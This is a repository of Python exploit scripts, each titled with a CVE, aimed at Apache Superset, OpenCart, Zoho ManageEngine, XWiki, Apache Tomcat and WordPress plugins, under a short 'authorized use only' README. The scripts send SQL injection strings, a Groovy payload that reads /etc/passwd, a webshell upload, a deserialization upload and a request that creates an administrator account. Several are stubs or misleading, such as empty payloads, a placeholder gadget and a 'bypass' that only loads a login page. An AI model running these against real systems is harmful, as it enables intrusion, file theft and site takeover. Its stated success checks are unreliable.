├── README.md ├── LICENSE ├── CVE-2024-7123.py ├── CVE-2024-8912.py ├── CVE-2024-1234.py ├── CVE-2024-5678.py ├── CVE-2025-24813.py ├── CVE-2025-24893.py ├── CVE-2024-8856.py └── CVE-2025-2563.py /README.md: -------------------------------------------------------------------------------- 1 | This repository contains a collection of custom-built exploits for penetration testing and security research purposes. All exploits are designed to demonstrate various attack vectors and techniques to enhance cybersecurity knowledge. 2 | 3 | # Disclaimer 4 | 5 | For authorized use only: Ensure you have permission before testing any system. 6 | 7 | The creators are not responsible for any damage caused by the misuse of these tools. 8 | 9 | Use ethically and responsibly. 10 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2025 Al Baradi Joy 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /CVE-2024-7123.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | def display_banner(): 4 | print("="*80) 5 | print("Exploit Title: CVE-2024-7123 - Apache Superset Authentication Bypass") 6 | print("Made By Al Baradi Joy") 7 | print("="*80) 8 | 9 | def detect_protocol(domain): 10 | https_url = f"https://{domain}" 11 | http_url = f"http://{domain}" 12 | 13 | try: 14 | response = requests.get(https_url, timeout=5) 15 | if response.status_code < 400: 16 | print(f"[✔] Target supports HTTPS: {https_url}") 17 | return https_url 18 | except requests.RequestException: 19 | print("[!] HTTPS not available, falling back to HTTP.") 20 | 21 | try: 22 | response = requests.get(http_url, timeout=5) 23 | if response.status_code < 400: 24 | print(f"[✔] Target supports HTTP: {http_url}") 25 | return http_url 26 | except requests.RequestException: 27 | print("[✖] Target is unreachable on both HTTP and HTTPS.") 28 | exit(1) 29 | 30 | def exploit(target_url): 31 | target_url = detect_protocol(target_url.replace("http://", "").replace("https://", "").strip()) 32 | exploit_url = f"{target_url}/login/" 33 | 34 | try: 35 | print(f"[+] Checking authentication bypass at: {exploit_url}") 36 | response = requests.get(exploit_url, timeout=10) 37 | 38 | if "Welcome to Apache Superset" in response.text: 39 | print("[✔] Exploit successful! Unauthorized access possible.") 40 | else: 41 | print("[✖] Exploit failed. No authentication bypass detected.") 42 | 43 | except requests.ConnectionError: 44 | print("[✖] Connection failed. Target may be down.") 45 | except requests.Timeout: 46 | print("[✖] Request timed out. Target is slow or unresponsive.") 47 | except requests.RequestException as e: 48 | print(f"[✖] Unexpected error: {e}") 49 | 50 | if __name__ == "__main__": 51 | display_banner() 52 | target = input("[?] Enter the target domain (without http/https): ").strip() 53 | exploit(target) 54 | -------------------------------------------------------------------------------- /CVE-2024-8912.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | def display_banner(): 4 | print("="*80) 5 | print("Exploit Title: CVE-2024-8912 - OpenCart Unauthenticated SQL Injection") 6 | print("Made By Al Baradi Joy") 7 | print("="*80) 8 | 9 | def detect_protocol(domain): 10 | https_url = f"https://{domain}" 11 | http_url = f"http://{domain}" 12 | 13 | try: 14 | response = requests.get(https_url, timeout=5) 15 | if response.status_code < 400: 16 | print(f"[✔] Target supports HTTPS: {https_url}") 17 | return https_url 18 | except requests.RequestException: 19 | print("[!] HTTPS not available, falling back to HTTP.") 20 | 21 | try: 22 | response = requests.get(http_url, timeout=5) 23 | if response.status_code < 400: 24 | print(f"[✔] Target supports HTTP: {http_url}") 25 | return http_url 26 | except requests.RequestException: 27 | print("[✖] Target is unreachable on both HTTP and HTTPS.") 28 | exit(1) 29 | 30 | def exploit(target_url): 31 | target_url = detect_protocol(target_url.replace("http://", "").replace("https://", "").strip()) 32 | exploit_url = f"{target_url}/index.php?route=product/search&search=' UNION SELECT 1,2,3-- -" 33 | 34 | try: 35 | print(f"[+] Sending SQL Injection payload to: {exploit_url}") 36 | response = requests.get(exploit_url, timeout=10) 37 | 38 | if "MySQL syntax error" in response.text: 39 | print("[✔] Exploit successful! SQL Injection vulnerability confirmed.") 40 | else: 41 | print("[✖] Exploit failed. No indication of vulnerability.") 42 | 43 | except requests.ConnectionError: 44 | print("[✖] Connection failed. Target may be down.") 45 | except requests.Timeout: 46 | print("[✖] Request timed out. Target is slow or unresponsive.") 47 | except requests.RequestException as e: 48 | print(f"[✖] Unexpected error: {e}") 49 | 50 | if __name__ == "__main__": 51 | display_banner() 52 | target = input("[?] Enter the target domain (without http/https): ").strip() 53 | exploit(target) 54 | -------------------------------------------------------------------------------- /CVE-2024-1234.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from urllib.parse import urlparse 3 | 4 | # Banner 5 | def display_banner(): 6 | exploit_title = "CVE-2024-1234: Exclusive Addons for Elementor Plugin Stored XSS" 7 | print("="*50) 8 | print(f"Exploit Title: {exploit_title}") 9 | print("Made By Al Baradi Joy") 10 | print("="*50) 11 | 12 | # Function to validate URL 13 | def validate_url(url): 14 | # Check if the URL is valid and well-formed 15 | parsed_url = urlparse(url) 16 | if not parsed_url.scheme in ["http", "https"]: 17 | print("Error: Invalid URL. Please ensure the URL starts with http:// or https://") 18 | return False 19 | return True 20 | 21 | # Function to exploit XSS vulnerability 22 | def exploit_xss(target_url): 23 | # The XSS payload to inject 24 | payload = "" 25 | 26 | # The parameters to be passed (in this case, we are exploiting the 's' parameter) 27 | params = { 28 | 's': payload 29 | } 30 | 31 | # Send a GET request to the vulnerable URL with the payload 32 | try: 33 | print(f"Sending exploit to: {target_url}") 34 | response = requests.get(target_url, params=params, timeout=10) 35 | 36 | # Check if the status code is OK and if the payload is reflected in the response 37 | if response.status_code == 200 and payload in response.text: 38 | print(f"XSS exploit successful! Payload: {payload}") 39 | elif response.status_code != 200: 40 | print(f"Error: Received non-OK status code {response.status_code}") 41 | else: 42 | print("Exploit failed or no XSS reflected.") 43 | except requests.exceptions.RequestException as e: 44 | print(f"Error: Request failed - {e}") 45 | except Exception as e: 46 | print(f"Unexpected error: {e}") 47 | 48 | if __name__ == "__main__": 49 | # Display banner 50 | display_banner() 51 | 52 | # Ask the user for the target URL 53 | target_url = input("Enter the target URL: ").strip() 54 | 55 | # Validate the provided URL 56 | if validate_url(target_url): 57 | # Call the exploit function if URL is valid 58 | exploit_xss(target_url) 59 | -------------------------------------------------------------------------------- /CVE-2024-5678.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | def display_banner(): 4 | print("="*80) 5 | print("Exploit Title: CVE-2024-5678 - Zoho ManageEngine Applications Manager SQL Injection") 6 | print("Made By Al Baradi Joy") 7 | print("="*80) 8 | 9 | def detect_protocol(domain): 10 | https_url = f"https://{domain}" 11 | http_url = f"http://{domain}" 12 | 13 | try: 14 | response = requests.get(https_url, timeout=5) 15 | if response.status_code < 400: 16 | print(f"[✔] Target supports HTTPS: {https_url}") 17 | return https_url 18 | except requests.RequestException: 19 | print("[!] HTTPS not available, falling back to HTTP.") 20 | 21 | try: 22 | response = requests.get(http_url, timeout=5) 23 | if response.status_code < 400: 24 | print(f"[✔] Target supports HTTP: {http_url}") 25 | return http_url 26 | except requests.RequestException: 27 | print("[✖] Target is unreachable on both HTTP and HTTPS.") 28 | exit(1) 29 | 30 | def exploit(target_url): 31 | target_url = detect_protocol(target_url.replace("http://", "").replace("https://", "").strip()) 32 | exploit_url = f"{target_url}/servlet/CreateMonitor" 33 | payload = { 34 | 'resourceid': '1', 35 | 'monitortype': '1', 36 | 'resourcename': '1', 37 | 'attributeid': '1', 38 | 'thresholdname': "1' OR '1'='1" 39 | } 40 | 41 | try: 42 | print(f"[+] Sending payload to: {exploit_url}") 43 | response = requests.post(exploit_url, data=payload, timeout=10) 44 | 45 | if "SQL syntax" in response.text: 46 | print("[✔] Exploit successful! SQL Injection vulnerability confirmed.") 47 | else: 48 | print("[✖] Exploit failed. No indication of vulnerability.") 49 | 50 | except requests.ConnectionError: 51 | print("[✖] Connection failed. Target may be down.") 52 | except requests.Timeout: 53 | print("[✖] Request timed out. Target is slow or unresponsive.") 54 | except requests.RequestException as e: 55 | print(f"[✖] Unexpected error: {e}") 56 | 57 | if __name__ == "__main__": 58 | display_banner() 59 | target = input("[?] Enter the target domain (without http/https): ").strip() 60 | exploit(target) 61 | -------------------------------------------------------------------------------- /CVE-2025-24813.py: -------------------------------------------------------------------------------- 1 | # Exploit Title: Apache Tomcat Path Equivalence - Remote Code Execution 2 | # Exploit Author: Al Baradi Joy 3 | # CVE: CVE-2025-24813 4 | # Date: 2025-04-06 5 | # Vendor Homepage: https://tomcat.apache.org/ 6 | # Software Link: https://tomcat.apache.org/download-90.cgi 7 | # Version: Apache Tomcat < 11.0.3 / 10.1.35 / 9.0.98 8 | # Tested on: Apache Tomcat 10.1.33 9 | # CVSS: 9.8 (CRITICAL) 10 | # CWE: CWE-44, CWE-502 11 | # Reference: https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html 12 | 13 | import requests 14 | import random 15 | import string 16 | import sys 17 | 18 | def rand_filename(length=6): 19 | return ''.join(random.choices(string.ascii_lowercase, k=length)) 20 | 21 | def generate_payload(interact_url): 22 | # Java serialized payload gadget triggering DNS interaction 23 | return f'\xac\xed\x00\x05...' # Replace with actual gadget bytes or generator 24 | 25 | def exploit(target, interact_url): 26 | filename = rand_filename() 27 | put_url = f"{target}/{filename}.session" 28 | get_url = f"{target}/{filename}" 29 | headers = { 30 | "Content-Range": "bytes 0-452/457", 31 | "Content-Type": "application/octet-stream" 32 | } 33 | payload = generate_payload(interact_url) 34 | 35 | print("[+] Exploit for CVE-2025-24813") 36 | print("[+] Made By Al Baradi Joy\n") 37 | print(f"[+] Uploading payload to: {put_url}") 38 | r1 = requests.put(put_url, data=payload, headers=headers) 39 | if r1.status_code == 201: 40 | print("[+] Payload uploaded successfully.") 41 | else: 42 | print(f"[-] Upload failed with status: {r1.status_code}") 43 | return 44 | 45 | print(f"[+] Triggering payload via: {get_url}") 46 | cookies = {"JSESSIONID": f".{filename}"} 47 | r2 = requests.get(get_url, cookies=cookies) 48 | print(f"[+] Trigger request sent. Check for DNS callback to: {interact_url}") 49 | 50 | if __name__ == "__main__": 51 | # Display banner first 52 | print("[+] Exploit for CVE-2025-24813") 53 | print("[+] Made By Al Baradi Joy\n") 54 | 55 | # Ask the user for the target domain and interact URL 56 | target_url = input("Enter the target domain (e.g., http://localhost:8080): ") 57 | interact_url = input("Enter your interactsh URL: ") 58 | 59 | exploit(target_url, interact_url) 60 | -------------------------------------------------------------------------------- /CVE-2025-24893.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | # Banner 4 | def display_banner(): 5 | print("="*80) 6 | print("Exploit Title: CVE-2025-24893 - XWiki Platform Remote Code Execution") 7 | print("Made By Al Baradi Joy") 8 | print("="*80) 9 | 10 | # Function to detect the target protocol (HTTP or HTTPS) 11 | def detect_protocol(domain): 12 | https_url = f"https://{domain}" 13 | http_url = f"http://{domain}" 14 | 15 | try: 16 | response = requests.get(https_url, timeout=5, allow_redirects=True) 17 | if response.status_code < 400: 18 | print(f"[✔] Target supports HTTPS: {https_url}") 19 | return https_url 20 | except requests.exceptions.RequestException: 21 | print("[!] HTTPS not available, falling back to HTTP.") 22 | 23 | try: 24 | response = requests.get(http_url, timeout=5, allow_redirects=True) 25 | if response.status_code < 400: 26 | print(f"[✔] Target supports HTTP: {http_url}") 27 | return http_url 28 | except requests.exceptions.RequestException: 29 | print("[✖] Target is unreachable on both HTTP and HTTPS.") 30 | exit(1) 31 | 32 | # Exploit function 33 | def exploit(target_url): 34 | target_url = detect_protocol(target_url.replace("http://", "").replace("https://", "").strip()) 35 | exploit_url = f"{target_url}/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d" 36 | 37 | try: 38 | print(f"[+] Sending request to: {exploit_url}") 39 | response = requests.get(exploit_url, timeout=10) 40 | 41 | # Check if the exploit was successful 42 | if response.status_code == 200 and "root:" in response.text: 43 | print("[✔] Exploit successful! Output received:") 44 | print(response.text) 45 | else: 46 | print(f"[✖] Exploit failed. Status code: {response.status_code}") 47 | 48 | except requests.exceptions.ConnectionError: 49 | print("[✖] Connection failed. Target may be down.") 50 | except requests.exceptions.Timeout: 51 | print("[✖] Request timed out. Target is slow or unresponsive.") 52 | except requests.exceptions.RequestException as e: 53 | print(f"[✖] Unexpected error: {e}") 54 | 55 | # Main execution 56 | if __name__ == "__main__": 57 | display_banner() 58 | target = input("[?] Enter the target URL (without http/https): ").strip() 59 | exploit(target) 60 | -------------------------------------------------------------------------------- /CVE-2024-8856.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | # Banner 4 | def display_banner(): 5 | print("="*80) 6 | print("Exploit Title: CVE-2024-8856 - WordPress Backup and Staging Plugin Arbitrary File Upload") 7 | print("Made By Al Baradi Joy") 8 | print("="*80) 9 | 10 | # Function to detect if the target supports HTTPS or falls back to HTTP 11 | def detect_protocol(domain): 12 | https_url = f"https://{domain}" 13 | http_url = f"http://{domain}" 14 | 15 | try: 16 | response = requests.get(https_url, timeout=5, allow_redirects=True) 17 | if response.status_code < 400: 18 | print(f"[✔] Target supports HTTPS: {https_url}") 19 | return https_url 20 | except requests.exceptions.RequestException: 21 | print("[!] HTTPS not available, falling back to HTTP.") 22 | 23 | try: 24 | response = requests.get(http_url, timeout=5, allow_redirects=True) 25 | if response.status_code < 400: 26 | print(f"[✔] Target supports HTTP: {http_url}") 27 | return http_url 28 | except requests.exceptions.RequestException: 29 | print("[✖] Target is unreachable on both HTTP and HTTPS.") 30 | exit(1) 31 | 32 | # Exploit function 33 | def exploit(target_url): 34 | target_url = detect_protocol(target_url.replace("http://", "").replace("https://", "").strip()) 35 | upload_url = f"{target_url}/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload.php" 36 | shell_url = f"{target_url}/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/shell.php?cmd=whoami" 37 | 38 | files = { 39 | 'file': ('shell.php', '', 'application/x-php') 40 | } 41 | 42 | try: 43 | print(f"[+] Attempting to upload shell to: {upload_url}") 44 | response = requests.post(upload_url, files=files, timeout=10) 45 | 46 | if response.status_code == 200: 47 | print(f"[✔] Exploit successful! Webshell available at: {shell_url}") 48 | else: 49 | print(f"[✖] Failed to upload shell. Status code: {response.status_code}") 50 | 51 | except requests.exceptions.ConnectionError: 52 | print("[✖] Connection failed. Target may be down.") 53 | except requests.exceptions.Timeout: 54 | print("[✖] Request timed out. Target is slow or unresponsive.") 55 | except requests.exceptions.RequestException as e: 56 | print(f"[✖] Unexpected error: {e}") 57 | 58 | # Main execution 59 | if __name__ == "__main__": 60 | display_banner() 61 | target = input("[?] Enter the target URL (without http/https): ").strip() 62 | exploit(target) 63 | -------------------------------------------------------------------------------- /CVE-2025-2563.py: -------------------------------------------------------------------------------- 1 | # Exploit Title: WordPress User Registration & Membership <= 4.1.1 - Unauthenticated Privilege Escalation 2 | # Exploit Author: Al Baradi Joy 3 | # CVE: CVE-2025-2563 4 | # Date: 2025-04-07 5 | # Vendor Homepage: https://wordpress.org/plugins/user-registration/ 6 | # Software Link: https://downloads.wordpress.org/plugin/user-registration.4.1.1.zip 7 | # Version: <= 4.1.1 8 | # Tested on: WordPress 6.4.3 9 | # CVSS: 9.8 (CRITICAL) 10 | # CWE: CWE-269 11 | # References: 12 | # - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-411-unauthenticated-privilege-escalation 13 | # - https://patchstack.com/database/wordpress/plugin/user-registration/vulnerability/wordpress-user-registration-membership-plugin-4-1-2-unauthenticated-privilege-escalation-vulnerability 14 | # - https://nvd.nist.gov/vuln/detail/CVE-2025-2563 15 | 16 | import re 17 | import json 18 | import requests 19 | import random 20 | import string 21 | from urllib.parse import urljoin 22 | 23 | def banner(): 24 | print("\n[+] CVE-2025-2563 - WP User Registration Privilege Escalation") 25 | print("[+] Made By Al Baradi Joy\n") 26 | 27 | def randstring(n=8): 28 | return ''.join(random.choices(string.ascii_lowercase, k=n)) 29 | 30 | def get_regex(content, pattern, group=1, name=""): 31 | match = re.search(pattern, content) 32 | if not match: 33 | raise ValueError(f"[-] Could not extract {name} (Pattern: {pattern})") 34 | return match.group(group) 35 | 36 | def exploit(target): 37 | session = requests.Session() 38 | username = randstring() 39 | password = randstring() + "!@" 40 | email = f"{username}@exploit.test" 41 | 42 | try: 43 | print("[+] Getting registration page...") 44 | r = session.get(urljoin(target, "/membership-registration/"), timeout=10) 45 | r.raise_for_status() 46 | page = r.text 47 | 48 | nonce = get_regex(page, r'"user_registration_form_data_save":"(.*?)"', name="nonce") 49 | formid = get_regex(page, r"id='user-registration-form-([0-9]+)'", name="formid") 50 | memval = get_regex(page, r'id="ur-membership-select-membership-([0-9]+)', name="membership value") 51 | memname = get_regex(page, r'data-field-id="membership_field_([0-9]+)"', name="membership field name") 52 | front_nonce = get_regex(page, r'name="ur_frontend_form_nonce" value="(.*?)"', name="frontend_nonce") 53 | loc_nonce = get_regex(page, r'ur_membership_frontend_localized_data = {"_nonce":"(.*?)"', name="localized_frontend_nonce") 54 | 55 | print("[+] Submitting registration form...") 56 | form_data = [ 57 | {"field_name": "user_login", "value": username, "field_type": "text", "label": "Username"}, 58 | {"field_name": "user_email", "value": email, "field_type": "email", "label": "User Email"}, 59 | {"field_name": "user_pass", "value": password, "field_type": "password", "label": "User Password"}, 60 | {"field_name": "user_confirm_password", "value": password, "field_type": "password", "label": "Confirm Password"}, 61 | {"value": memval, "field_type": "radio", "label": "membership", "field_name": f"membership_field_{memname}"} 62 | ] 63 | 64 | payload = { 65 | "action": "user_registration_user_form_submit", 66 | "security": nonce, 67 | "form_data": json.dumps(form_data), 68 | "form_id": formid, 69 | "registration_language": "en-US", 70 | "ur_frontend_form_nonce": front_nonce, 71 | "is_membership_active": memval, 72 | "membership_type": memval 73 | } 74 | 75 | r2 = session.post(urljoin(target, "/wp-admin/admin-ajax.php"), data=payload, timeout=10) 76 | 77 | if '"success":true' not in r2.text: 78 | print("[-] Registration form failed.") 79 | return 80 | 81 | print("[+] Sending membership registration as administrator...") 82 | member_payload = { 83 | "action": "user_registration_membership_register_member", 84 | "security": loc_nonce, 85 | "members_data": json.dumps({ 86 | "membership": "1", 87 | "payment_method": "free", 88 | "start_date": "2025-3-29", 89 | "username": username, 90 | "role": "administrator" 91 | }) 92 | } 93 | 94 | r3 = session.post(urljoin(target, "/wp-admin/admin-ajax.php"), data=member_payload, timeout=10) 95 | 96 | if '"success":true' in r3.text: 97 | print("[+] Exploit Successful!") 98 | print(f"[+] Admin Username: {username}") 99 | print(f"[+] Admin Password: {password}") 100 | else: 101 | print("[-] Membership escalation failed.") 102 | 103 | except Exception as e: 104 | print(f"[-] Exploit failed: {str(e)}") 105 | 106 | if __name__ == "__main__": 107 | banner() 108 | target = input("Enter target WordPress site (e.g., http://example.com): ").strip().rstrip('/') 109 | if not target.startswith("http"): 110 | target = "http://" + target 111 | exploit(target) 112 | --------------------------------------------------------------------------------